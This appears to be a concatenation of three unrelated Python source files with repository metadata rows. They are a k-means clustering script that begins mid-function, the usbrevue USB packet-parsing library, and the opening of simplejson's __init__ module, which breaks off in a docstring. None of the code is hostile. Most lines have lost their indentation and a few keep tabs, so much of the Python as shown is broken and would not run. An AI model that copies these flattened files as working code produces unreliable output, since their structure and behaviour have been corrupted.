distance = ( (point_x - centroid_x) ** 2 ) + ( (point_y - centroid_y) ** 2 )
distance = distance ** (0.5)
return round(distance, 4)
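# Worked example: euclidean_distance((0, 0), (3, 4)) returns 5.0 -- the
# classic 3-4-5 right triangle, rounded to 4 decimal places.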
def get_coordinates(points):
#get coordinates for the points given in tuple form
print("Please provide coordinates for the {} points. (x, y)".format(points))
coordinates = []
for coords in range(points):
#read as a tuple i.e (x, y)
user_coords = input()
user_coords = user_coords.split(',')
x, y = int(user_coords[0]), int(user_coords[1])
coordinates.append((x, y))
return coordinates
def get_coords(file_name):
'''Get coordinates from a file.'''
file_handle = open(file_name, "r")
file_coords = []
for content in file_handle:
content = content.replace(' ', "").replace("\n", "").replace('"', "").split(',')
coord = int(content[0]), int(content[1])
file_coords.append(coord)
return file_coords
def get_group_matrix(coords, centroid_one, centroid_two):
'''Returns a group matrix'''
euclid_distance = []
grp_matrix = []
for y in coords:
#get distance for each point in regard to centroid one
distance_one = euclidean_distance(y, centroid_one)
#get distance for each point in regard to centroid two
distance_two = euclidean_distance(y, centroid_two)
euclid_distance.append((distance_one, distance_two))
		#group matrix conditions
		if distance_one > distance_two:
			grp_matrix.append((0, 1))
		elif distance_one < distance_two:
			grp_matrix.append((1, 0))
		else:
			#tie: keep the point in cluster one so grp_matrix stays aligned with coords
			grp_matrix.append((1, 0))
return grp_matrix
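# Illustrative call (made-up points): with centroids (1, 1) and (5, 7),
#   get_group_matrix([(1, 1), (4, 6)], (1, 1), (5, 7)) -> [(1, 0), (0, 1)]
# i.e. the first point is assigned to cluster one, the second to cluster two.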
def get_avg_centroid(x_y_index, coords):
	'''Returns new centroid coordinates if more than 1 point appears in any cluster'''
x_coords, y_coords = [], []
for index in x_y_index:
#new_points.append(coords[index])
x, y = coords[index]
x_coords.append(x)
y_coords.append(y)
#get average of both x and y coords
x_coords = round(sum(x_coords) / (len(x_coords) * 1.0), 4)
y_coords = round(sum(y_coords) / (len(y_coords) * 1.0), 4)
centroid = (x_coords, y_coords)
return centroid
def k_means_clustering(points):
'''Return the group matrix given coordinates'''
coords = get_coordinates(points)
centroids = []
euclid_distance = []
group_distance = []
grp_matrix = []
#create an alphabet number mapping
alphabets = dict(A = 1,B = 2,C = 3,D = 4,E = 5,F = 6,G = 7,H = 8,I = 9,J = 10,K = 11,L = 12,M = 13,
N = 14,O = 15,P = 16,Q = 17,R = 18,S = 19,T = 20,U = 21,V = 22,W = 23,X = 24,Y = 25,Z = 26)
#get two random centroids
i = 0
limit = 2
	#ensure that the two chosen centroid indices are distinct
while i <= limit:
k = random.randint(0, (points-1))
if k not in centroids:
centroids.append(k)
		if len(centroids) != 2:
limit *= 2
else:
break
#get the centroids as per the above rand positions
centroids = tuple(centroids)
i, j = centroids
centroid_one = coords[i]
centroid_two = coords[j]
print("\nRandom Centroids->",centroid_one, centroid_two)
#get the group matrix
grp_matrix = get_group_matrix(coords, centroid_one, centroid_two)
while True:
#iterate till group matrix is stable
#get the number of points in each cluster
a, b, m_index_values, n_index_values = [], [], [], []
for index, x_y_values in enumerate(grp_matrix):
m, n = x_y_values
a.append(m)
b.append(n)
if m == 1:
m_index_values.append(index)
elif n == 1:
n_index_values.append(index)
cluster_one_elems = sum(a)
cluster_two_elems = sum(b)
if cluster_one_elems == 1:
#use the same centroid from the previous one
centroid_one = centroid_one
elif cluster_one_elems > 1:
#new centroid is the average of the elements
centroid_one = get_avg_centroid(m_index_values, coords)
if cluster_two_elems == 1:
#use the same centroid used in the last iteration
centroid_two = centroid_two
elif cluster_two_elems > 1:
#new centroid is the average of the elements
centroid_two= get_avg_centroid(n_index_values, coords)
print("New Centroids->",centroid_one, centroid_two)
#get new group matrix
new_grp_matrix = get_group_matrix(coords, centroid_one, centroid_two)
#when no more change happens, stop iteration
if new_grp_matrix == grp_matrix:
return grp_matrix
grp_matrix = new_grp_matrix
if __name__ == "__main__":
guess = int(input('Enter the number of coordinates to input : '))
print(k_means_clustering(guess))
| TonyHinjos/Machine-Learning-Algorithms-Toolkit | k-means-clustering/k_means_cluster.py | Python | mit | 4,794 |
#!/usr/bin/env python
#
# Copyright (C) 2011 Austin Leirvik <aua at pdx.edu>
# Copyright (C) 2011 Wil Cooley <wcooley at pdx.edu>
# Copyright (C) 2011 Joanne McBride <[email protected]>
# Copyright (C) 2011 Danny Aley <[email protected]>
# Copyright (C) 2011 Erich Ulmer <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Core USB REVue classes: PackedFields, Packet and SetupField.
* PackedFields represents a generic interface to unpacking and repacking
data based on a table.
* Packet represents a USBMon packet.
* SetupField represents the 'setup' attribute of the Packet.
"""
__version__ = '0.0.1'
#import sys
from array import array
from collections import MutableSequence, Sequence
from functools import partial
from logging import debug
from pprint import pprint, pformat
from struct import unpack_from, pack_into, unpack
import datetime
#import logging
#logging.basicConfig(level=logging.DEBUG)
from util import reverse_update_dict, apply_mask
USBMON_PACKET_FORMAT = dict(
# Attr fmt offset
urb = ('<Q', 0),
event_type = ('<c', 8),
xfer_type = ('<B', 9),
epnum = ('<B', 10),
devnum = ('<B', 11),
busnum = ('<H', 12),
flag_setup = ('<c', 14),
flag_data = ('<c', 15),
ts_sec = ('<q', 16),
ts_usec = ('<i', 24),
status = ('<i', 28),
length = ('<I', 32),
len_cap = ('<I', 36),
setup = ('<8s', 40),
error_count = ('<i', 40),
numdesc = ('<i', 44),
interval = ('<i', 48),
start_frame = ('<i', 52),
xfer_flags = ('<I', 56),
ndesc = ('<I', 60),
data = ('<%dB', 64),
)
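# Note: the 'data' entry's format string contains a %d placeholder for the
# payload length, so unpacking it goes through something like
# unpack_from('<%dB' % 8, datapack, 64) for an 8-byte payload (see
# Packet.data below, which supplies that length via unpacket()).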
# Note that the packet transfer type has different numeric identifiers than the
# endpoint transfer types in the Linux kernel headers <linux/usb/ch9.h>:
#define USB_ENDPOINT_XFER_CONTROL 0
#define USB_ENDPOINT_XFER_ISOC 1
#define USB_ENDPOINT_XFER_BULK 2
#define USB_ENDPOINT_XFER_INT 3
USBMON_TRANSFER_TYPE = dict(
isochronous = 0,
interrupt = 1,
control = 2,
bulk = 3,
)
# Add the reverse to the dict for convenience
reverse_update_dict(USBMON_TRANSFER_TYPE)
class PackedFields(object):
"""Base class for field decodings/unpacking.
The PackedFields class provides access to named fields in binary data with
on-demand packing and unpacking.
A PackedFields object is defined by a format table and sequence of data.
The format table lists the name of the field (which becomes an object
attribute), a ``struct`` format code and byte offset.
The format table is a dict with entries with the following format:
key: (format, offset)
"""
# This must exist so __setattr__ can find key 'format_table' missing from
# self.format_table when it is being initialized.
format_table = dict()
def __init__(self, format_table=None, datapack=None, update_parent=None):
"""Takes as arguments:
1. format_table
Described above
2. datapack
String or array of packed data
3. update_parent
Call-back function to enable attribute changes to flow up a
                hierarchy of PackedField objects. It requires, as argument, the
datapack of the sub-object. Can be None.
"""
self._cache = dict()
if format_table != None:
self.format_table = format_table
self.datapack = datapack
self.update_parent = update_parent
def cache(self, attr, lookup_func):
if not self._cache.has_key(attr):
self._cache[attr] = lookup_func(attr)
return self._cache[attr]
# Generic attribute accessor
# Note that we unpack the single item from the tuple in __getattr__ due to
# setup()
def unpacket(self, attr, fmtx=None):
"""Unpack attr from self.datapack using (struct) format string and
offset from self.format_table. fmtx can be used to provide additional
data for string-formatting that may be in the format string.
Returns the tuple of data as from struct.unpack_from."""
fmt, offset = self.format_table[attr]
if fmtx != None: fmt %= fmtx
return unpack_from(fmt, self.datapack, offset)
def __getattr__(self, attr):
"""Pull attr from cache, looking it up with unpacket if necessary."""
return self.cache(attr, lambda a: self.unpacket(a)[0])
def repacket(self, attr, vals, fmtx=None):
"""Repack attr into self.datapack using (struct) format string and
offset from self.format_table. fmtx can be used to provide additional
data for string-formatting that may be in the format string."""
debug('repacket: attr: {0}, vals: {1}, fmtx: {2}'.format(attr,
pformat(vals), fmtx))
fmt, offset = self.format_table[attr]
if fmtx != None: fmt %= fmtx
return pack_into(fmt, self.datapack, offset, *vals)
def __setattr__(self, attr, val):
"""__setattr__ is called went setting all attributes, so it must
differentiate between tabled-based attributes and regular attributes.
If the attribute is not a key in self.format_table, then it calls up to
``object``'s __setattr__, which handles "normal" attributes,
properties, etc."""
if attr in self.format_table:
self._cache[attr] = val
self.repacket(attr, [val])
if self.update_parent != None:
self.update_parent(self.datapack)
else:
# This makes properties and non-format_table attributes work
object.__setattr__(self, attr, val)
    # Implementing __getitem__ and __setitem__ permits the object to be used as
# a mapping type, so it can be used as e.g. the global or local namespace
# with 'eval'.
def __getitem__(self, attr):
"""Allows instance to be accessed as dict using attributes as keys."""
return getattr(self, attr)
def __setitem__(self, attr, val):
"""Allows instance to be updated as dict using attributes as keys."""
setattr(self, attr, val)
@property
def datapack(self):
"""Holds the array containing the data which is packed into or unpacked
from."""
return self.__dict__['datapack']
@datapack.setter
def datapack(self, value):
if isinstance(value, Sequence) and \
not isinstance(value, MutableSequence):
self.__dict__['datapack'] = array('c', value)
else:
self.__dict__['datapack'] = value
def repack(self):
"""
Returns a string representation of the datapack.
"""
return self.datapack.tostring()
def __eq__(self, other):
return self.datapack == other.datapack
def __ne__(self, other):
return self.datapack != other.datapack
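# A minimal sketch of how PackedFields is driven; the field names, layout and
# bytes below are made up purely for illustration:
#   EXAMPLE_FORMAT = dict(
#       length = ('<H', 0),   # little-endian unsigned short at offset 0
#       flags  = ('<B', 2),   # single byte at offset 2
#   )
#   rec = PackedFields(EXAMPLE_FORMAT, '\x08\x00\x01')
#   rec.length          # -> 8, unpacked on demand and cached
#   rec.flags = 0x02    # repacked into rec.datapack immediately
#   rec.repack()        # -> '\x08\x00\x02'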
class Packet(PackedFields):
"""The ``Packet`` class adds higher-level semantics over the lower-level
field packing and unpacking.
The following attributes are extracted dynamically from the packet data and
re-packed into the data when assigned to.
* urb
* event_type
* xfer_type
* epnum
* devnum
* busnum
* flag_setup
* flag_data
* ts_sec
* ts_usec
* status
* length
* len_cap
* xfer_flags
* ndesc
* data
Other attributes are extracted dynamically but require more implementation
than PackedFields provides by default and thus are separate properties with
their own docstrings.
These attributes correspond with the struct usbmon_packet data members from:
http://www.kernel.org/doc/Documentation/usb/usbmon.txt
"""
def __init__(self, hdr=None, pack=None):
"""Requires a libpcap/pcapy header and packet data."""
super(Packet, self).__init__()
self.format_table = USBMON_PACKET_FORMAT
if None not in (hdr, pack):
if len(pack) < 64:
raise RuntimeError("Not a USB Packet")
self._hdr = hdr
self.datapack = array('c', pack)
if self.event_type not in ['C', 'S', 'E'] or \
self.xfer_type not in USBMON_TRANSFER_TYPE.values():
raise RuntimeError("Not a USB Packet")
@property
def hdr(self):
"""Accessor for libpcap header."""
return self._hdr
def diff(self, other):
"""Compare self with other packet.
Return list of 3-tuples of (attr, my_val, other_val)."""
result = list()
for f in self.fields:
m = getattr(self, f)
o = getattr(other, f)
if m != o:
result.append((f, m, o))
return result
@property
def field_dict(self):
"""Return a dict of attributes and values."""
pdict = dict()
for attr in USBMON_PACKET_FORMAT:
pdict[attr] = getattr(self, attr)
return pdict
@property
def fields(self):
"""Return a list of packet header fields"""
return [ attr for attr in USBMON_PACKET_FORMAT ]
@property
def datalen(self):
"""Return the length of the data payload of the packet."""
return len(self.datapack) - 64
# Special attribute accessors that have additional restrictions
@property
def data(self):
"""Data payload. Note that while there is only a get accessor for this
attribute, it is a list and is therefore mutable. It cannot, however,
be easily grown or shrunk."""
return self.cache('data',
lambda a: list(self.unpacket(a, self.datalen)))
def data_hexdump(self, maxlen=None):
"""Space-delimited dump of data in hex"""
return ' '.join(map(lambda x: '%02X' % x, self.data[:maxlen]))
def repack(self):
"""Returns the packet data as a string, taking care to repack any
"loose" attributes."""
self.repacket('data', self.data, self.datalen)
return super(Packet, self).repack()
@property
def setup(self):
"""An instance of the SetupField class."""
def _update_setup(self, datapack):
self.repacket('setup', [datapack.tostring()])
if self.is_setup_packet:
return self.cache('setup',
lambda a:
SetupField(self.unpacket(a)[0],
partial(_update_setup, self)))
# error_count and numdesc are only meaningful for isochronous transfers
# (xfer_type == 0)
@property
def error_count(self):
"""Isochronous error_count"""
if self.is_isochronous_xfer:
return self.cache('error_count', lambda a: self.unpacket(a)[0])
else:
# FIXME Raise WrongPacketXferType instead
return 0
@property
def numdesc(self):
"""Isochronous numdesc"""
if self.is_isochronous_xfer:
return self.cache('numdesc', lambda a: self.unpacket(a)[0])
else:
# FIXME Raise WrongPacketXferType instead
return 0
# interval is only meaningful for isochronous or interrupt transfers
# (xfer_type in [0,1])
@property
def interval(self):
"""Isochronous/interrupt interval"""
if self.is_isochronous_xfer or self.is_interrupt_xfer:
return self.cache('interval', lambda a: self.unpacket(a)[0])
else:
# FIXME Raise WrongPacketXferType instead
return 0
@property
def start_frame(self):
"""Isochronous start_frame"""
# start_frame is only meaningful for isochronous transfers
if self.is_isochronous_xfer:
return self.cache('start_frame', lambda a: self.unpacket(a)[0])
else:
# FIXME Raise WrongPacketXferType instead
return 0
# Boolean tests for transfer types
@property
def is_isochronous_xfer(self):
"""Boolean test if transfer-type is isochronous"""
return self.xfer_type == USBMON_TRANSFER_TYPE['isochronous']
@property
def is_bulk_xfer(self):
"""Boolean test if transfer-type is bulk"""
return self.xfer_type == USBMON_TRANSFER_TYPE['bulk']
@property
def is_control_xfer(self):
"""Boolean test if transfer-type is control"""
return self.xfer_type == USBMON_TRANSFER_TYPE['control']
@property
def is_interrupt_xfer(self):
"""Boolean test if transfer-type is interrupt"""
return self.xfer_type == USBMON_TRANSFER_TYPE['interrupt']
# NB: The usbmon doc says flag_setup should be 's' but that seems to be
    # only for the text interface, because it seems to be 0x00 and
# Wireshark agrees.
@property
def is_setup_packet(self):
"""Boolean test to determine if packet is a setup packet"""
return self.flag_setup == '\x00'
@property
def is_event_type_submission(self):
"""Boolean test if event-type is submission"""
return self.event_type == 'S'
@property
def is_event_type_callback(self):
"""Boolean test if event-type is callback"""
return self.event_type == 'C'
@property
def is_event_type_error(self):
"""Boolean test if event-type is error"""
return self.event_type == 'E'
@property
def ep_dir_ch(self):
"""Single-char representation of endpoint direction"""
return ['o', 'i'][self.epnum >> 7]
@property
def endpoint_dir(self):
"""Verbose representation of endpoint direction"""
return ['outgoing', 'incoming'][self.epnum >> 7]
@property
def xfer_type_ch(self):
"""Single-char representation of xfer_type"""
return ['Z', 'I', 'C', 'B'][self.xfer_type]
@property
def transfer_type(self):
"""Verbose representation of transfer type"""
return ['Isochronous', 'Interrupt', 'Control', 'Bulk'][self.xfer_type]
@property
def addr(self):
"""Packet address"""
# Does it make sense to have two decimals followed by a hex?
return "%d:%02d:%02x" % (self.busnum, self.devnum, self.epnum)
@property
def address_verbose(self):
"""Verbose packet address"""
return "bus %d, device %d, endpoint 0x%x" % (self.busnum,
self.devnum, self.epnum)
@property
def event_type_preposition(self):
"""Verbose event-type"""
return {'S': 'Submission to',
'C': 'Callback from',
'E': 'Error on'}[self.event_type]
@property
def typedir(self):
"""Abbreviated packet type & direction, a la usbmon: 'Ci', 'Co', etc."""
return self.xfer_type_ch + self.ep_dir_ch
@property
def packet_summ(self):
"""Summary of packet event type, address, etc."""
return "%s %s (%s)" % (self.event_type, self.addr, self.typedir)
def copy(self):
"""Make a complete copy of the Packet."""
new_packet = Packet(self.hdr, self.datapack)
return new_packet
def print_pcap_fields(self):
# FIXME This should be __str__ and can probably do most or all of this
# programmatically--iterating through each attribute by offset.
# Requires that inappropriate attributes raise exceptions, etc.
"""Print detailed packet header information for debug purposes. """
print "urb = %d" % (self.urb)
print "event_type = %s" % (self.event_type)
print "xfer_type = %d" % (self.xfer_type)
print "epnum = %d" % (self.epnum)
print "devnum = %d" % (self.devnum)
print "busnum = %d" % (self.busnum)
print "flag_setup = %s" % (self.flag_setup)
print "flag_data = %s" % (self.flag_data)
print "ts_sec = %d" % (self.ts_sec,)
print "ts_usec = %d" % (self.ts_usec)
print "status = %d" % (self.status)
print "length = %d" % (self.length)
print "len_cap = %d" % (self.len_cap)
# setup is only meaningful if self.is_setup_packet is True)
if self.is_setup_packet:
print "setup = %s" % (self.setup.data_to_str())
# error_count and numdesc are only meaningful for isochronous transfers
# (xfer_type == 0)
#if (self.xfer_type == 0):
if self.is_isochronous_xfer:
print "error_count = %d" % (self.error_count)
print "numdesc = %d" % (self.numdesc)
# interval is only meaningful for isochronous or interrupt transfers)
# (xfer_type in [0,1]))
#if (self.xfer_type in [0,1]):
if self.is_isochronous_xfer or self.is_interrupt_xfer:
print "interval = %d" % (self.interval)
# start_frame is only meaningful for isochronous transfers)
if self.is_isochronous_xfer:
print "start_frame = %d" % (self.start_frame)
print "xfer_flags = %d" % (self.xfer_flags)
print "ndesc = %d" % (self.ndesc)
# print "datalen = " % (datalen)
# print "data = " % (self.data)
print "data =", self.data
# print "hdr = " % (self.hdr)
print "hdr =", self.hdr
# print "packet = " % (self.pack)
def print_pcap_summary(self):
"""Print concise pcap header summary information for debug purposes."""
print ('%s: Captured %d bytes, truncated to %d bytes' % (
datetime.datetime.now(), self.hdr.getlen(),
self.hdr.getcaplen()))
SETUP_FIELD_FORMAT = dict(
bmRequestType = ('<B', 0),
bRequest = ('<B', 1),
wValue = ('<H', 2),
wIndex = ('<H', 4),
wLength = ('<H', 6),
)
# bRequest values (with particular bmRequestType values)
SETUP_REQUEST_TYPES = dict(
GET_STATUS = 0x00,
CLEAR_FEATURE = 0x01,
# Reserved = 0x02,
SET_FEATURE = 0x03,
# Reserved = 0x04,
SET_ADDRESS = 0x05,
GET_DESCRIPTOR = 0x06,
SET_DESCRIPTOR = 0x07,
GET_CONFIGURATION = 0x08,
SET_CONFIGURATION = 0x09,
GET_INTERFACE = 0x0A,
SET_INTERFACE = 0x0B,
SYNCH_FRAME = 0x0C,
# Reserved = 0x0D,
# ... = 0xFF,
)
reverse_update_dict(SETUP_REQUEST_TYPES)
REQUEST_TYPE_DIRECTION = dict(
#-> 7_______
device_to_host = 0b10000000,
host_to_device = 0b00000000,
)
reverse_update_dict(REQUEST_TYPE_DIRECTION)
REQUEST_TYPE_TYPE = dict(
#-> _65_____
standard = 0b00000000,
class_ = 0b00100000,
vendor = 0b01000000,
reserved = 0b01100000,
)
reverse_update_dict(REQUEST_TYPE_TYPE)
REQUEST_TYPE_RECIPIENT = dict(
#-> ___43210
device = 0b00000000,
interface = 0b00000001,
endpoint = 0b00000010,
other = 0b00000011,
# Reserved = 0b000*****
)
reverse_update_dict(REQUEST_TYPE_RECIPIENT)
REQUEST_TYPE_MASK = dict(
direction = 0b10000000,
type_ = 0b01100000,
recipient = 0b00011111,
)
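# Worked example of the bit fields above, using the 8 setup bytes of a
# standard GET_DESCRIPTOR(DEVICE) request, 80 06 00 01 00 00 12 00:
#   bmRequestType 0x80 -> direction: device_to_host, type: standard,
#                         recipient: device (per the masks above)
#   bRequest      0x06 -> GET_DESCRIPTOR
#   wValue      0x0100 -> descriptor type 1 (DEVICE), index 0
#   wLength     0x0012 -> 18 bytes requested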
class SetupField(PackedFields):
"""The ``SetupField`` class provides access to the ``setup`` field of the
Packet class. As the ``setup`` field is a multi-byte field with bit-mapped
and numeric encodings, this class provides higher-level accessors which
decode the various subfields.
Dynamic accessors for this class are:
* bmRequestType
* bRequest
* wValue
* wIndex
* wLength
There are several additional accessors for the subfields of the bit-mapped
bmRequestType.
"""
def __init__(self, data=None, update_parent=None):
PackedFields.__init__(self, SETUP_FIELD_FORMAT, data, update_parent)
def _bmRequestType_mask(self, mask):
return self.bmRequestType & REQUEST_TYPE_MASK[mask]
@property
def bmRequestTypeDirection(self):
"""Decode 'direction' bits of bmRequestType. Gets and sets the
following strings:
* device_to_host
* host_to_device
"""
return REQUEST_TYPE_DIRECTION[self._bmRequestType_mask('direction')]
@bmRequestTypeDirection.setter
def bmRequestTypeDirection(self, val):
self.bmRequestType = apply_mask(REQUEST_TYPE_MASK['direction'],
self.bmRequestType,
REQUEST_TYPE_DIRECTION[val])
@property
def bmRequestTypeType(self):
"""Decode 'type' bits of bmRequestType. Gets and sets the following
strings:
* standard
* class_
* vendor
* reserved
"""
return REQUEST_TYPE_TYPE[self._bmRequestType_mask('type_')]
@bmRequestTypeType.setter
def bmRequestTypeType(self, val):
self.bmRequestType = apply_mask(REQUEST_TYPE_MASK['type_'],
self.bmRequestType,
REQUEST_TYPE_TYPE[val])
@property
def bmRequestTypeRecipient(self):
"""Decode 'recipient' bits of bmRequestType. Gets and sets the
following strings:
* device
* interface
* endpoint
* other
"""
return REQUEST_TYPE_RECIPIENT[self._bmRequestType_mask('recipient')]
@bmRequestTypeRecipient.setter
def bmRequestTypeRecipient(self, val):
self.bmRequestType = apply_mask(REQUEST_TYPE_MASK['recipient'],
self.bmRequestType,
REQUEST_TYPE_RECIPIENT[val])
@property
def bRequest_str(self):
if self.bRequest in SETUP_REQUEST_TYPES:
return SETUP_REQUEST_TYPES[self.bRequest]
else:
return 'unknown'
def data_to_str(self):
"""Compact hex representation of setup data. Note that due to
endianness, byte orders may appear to differ from the bytes as
presented in ``fields_to_str``.
"""
return '%02X %02X %02X%02X %02X%02X %02X%02X' % \
unpack('<8B', self.datapack.tostring()) # yuck
def fields_to_str(self):
"""Verbose but single-line string representation of setup data.
"""
s = 'bmRequestType: %s, %s, %s (%s)' % (self.bmRequestTypeType,
self.bmRequestTypeDirection,
self.bmRequestTypeRecipient,
bin(self.bmRequestType))
s += '; bRequest: %s (0x%X)' % (self.bRequest_str, self.bRequest)
s += '; wValue: (0x%X)' % self.wValue
s += '; wIndex: (0x%X)' % self.wIndex
s += '; wLength: (0x%X)' % self.wLength
return s
def __str__(self):
#s = 'type: %s' % self.bmRequestTypeType
s = ''
s += self.fields_to_str()
if self.bmRequestTypeType == 'standard':
s += ', request: %s' % self.bRequest_str
s += ', direction: %s' % self.bmRequestTypeDirection
s += ', recipient: %s' % self.bmRequestTypeRecipient
#else:
s += ', data: %s' % self.data_to_str()
return s
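# A brief usage sketch for the accessors above (hedged; `pkt` is a hypothetical
# Packet instance and is not defined in this module):
#
#     setup = pkt.setup
#     if pkt.is_setup_packet and setup.bmRequestTypeType == 'standard':
#         print setup.fields_to_str()
#         if setup.bRequest_str == 'GET_DESCRIPTOR':
#             print "descriptor length requested:", setup.wLength
#
# The bit-mapped accessors may also be assigned by name, e.g.
#     setup.bmRequestTypeDirection = 'host_to_device'
# which rewrites only the direction bits of bmRequestType.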
class WrongPacketXferType(Exception):
"""Exception that should be raised when data Packet fields are accessed for
inappropriate transfer types. Note that this is currently not done."""
pass
if __name__ == '__main__':
# read a pcap file from stdin, replace the first byte of any data found
# with 0x42, and write the modified packets to stdout
import pcapy
#pcap = pcapy.open_offline('-')
#pcap = pcapy.open_offline('../test-data/usb-single-packet-8bytes-data.pcap')
pcap = pcapy.open_offline('../test-data/usb-single-packet-2.pcap')
#out = pcap.dump_open('-')
while 1:
hdr, pack = pcap.next()
if hdr is None:
break # EOF
p = Packet(hdr, pack)
#p.print_pcap_fields()
#p.print_pcap_summary()
#if len(p.data) > 0:
# p.data[0] = 0x42
#out.dump(hdr, p.repack())
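# A hedged sketch of the full rewrite described at the top of this block
# (read from stdin, patch the first data byte, write to stdout); it simply
# recombines the commented-out lines above and assumes Packet.repack()
# rebuilds the raw packet bytes from the modified fields:
#
#     pcap = pcapy.open_offline('-')
#     out = pcap.dump_open('-')
#     while 1:
#         hdr, pack = pcap.next()
#         if hdr is None:
#             break
#         p = Packet(hdr, pack)
#         if len(p.data) > 0:
#             p.data[0] = 0x42
#         out.dump(hdr, p.repack())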
| wcooley/usbrevue | usbrevue.py | Python | gpl-3.0 | 25,073 |
r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`simplejson` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility back to Python 2.5 and (currently) has significant performance
advantages, even without using the optional C extension for speedups.
Encoding basic Python object hierarchies::
>>> import simplejson as json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print(json.dumps("\"foo\bar"))
"\"foo\bar"
>>> print(json.dumps(u'\u1234'))
"\u1234"
>>> print(json.dumps('\\'))
"\\"
>>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True))
{"a": 0, "b": 0, "c": 0}
>>> from simplejson.compat import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson as json
>>> obj = [1,2,3,{'4': 5, '6': 7}]
>>> json.dumps(obj, separators=(',',':'), sort_keys=True)
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson as json
>>> print(json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=' '))
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson as json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from simplejson.compat import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import simplejson as json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> from decimal import Decimal
>>> json.loads('1.1', parse_float=Decimal) == Decimal('1.1')
True
Specializing JSON object encoding::
>>> import simplejson as json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... raise TypeError('Object of type %s is not JSON serializable' %
... obj.__class__.__name__)
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using simplejson.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expecting property name: line 1 column 3 (char 2)
Parsing multiple documents serialized as JSON lines (newline-delimited JSON)::
>>> import simplejson as json
>>> def loads_lines(docs):
... for doc in docs.splitlines():
... yield json.loads(doc)
...
>>> sum(doc["count"] for doc in loads_lines('{"count":1}\n{"count":2}\n{"count":3}\n'))
6
Serializing multiple objects to JSON lines (newline-delimited JSON)::
>>> import simplejson as json
>>> def dumps_lines(objs):
... for obj in objs:
... yield json.dumps(obj, separators=(',',':')) + '\n'
...
>>> ''.join(dumps_lines([{'count': 1}, {'count': 2}, {'count': 3}]))
'{"count":1}\n{"count":2}\n{"count":3}\n'
"""
from __future__ import absolute_import
__version__ = '3.16.1'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONDecodeError', 'JSONEncoder',
'OrderedDict', 'simple_first', 'RawJSON'
]
__author__ = 'Bob Ippolito <[email protected]>'
from decimal import Decimal
from .errors import JSONDecodeError
from .raw_json import RawJSON
from .decoder import JSONDecoder
from .encoder import JSONEncoder, JSONEncoderForHTML
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
from . import ordered_dict
return ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
def _import_c_make_encoder():
try:
from ._speedups import make_encoder
return make_encoder
except ImportError:
return None
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
use_decimal=True,
namedtuple_as_object=True,
tuple_as_array=True,
iterable_as_array=False,
bigint_as_string=False,
item_sort_key=None,
for_json=False,
ignore_nan=False,
int_as_string_bitcount=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=True,
namedtuple_as_object=True, tuple_as_array=True,
bigint_as_string=False, sort_keys=False, item_sort_key=None,
for_json=False, ignore_nan=False, int_as_string_bitcount=None,
iterable_as_array=False, **kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If *skipkeys* is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If *ensure_ascii* is false, then some chunks written to ``fp``
may be ``unicode`` instances, subject to normal Python ``str`` to
``unicode`` coercion rules. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
to cause an error.
If *check_circular* is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If *allow_nan* is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance with the original JSON specification, instead of using
the JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``). See
*ignore_nan* for ECMA-262 compliant behavior.
If *indent* is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
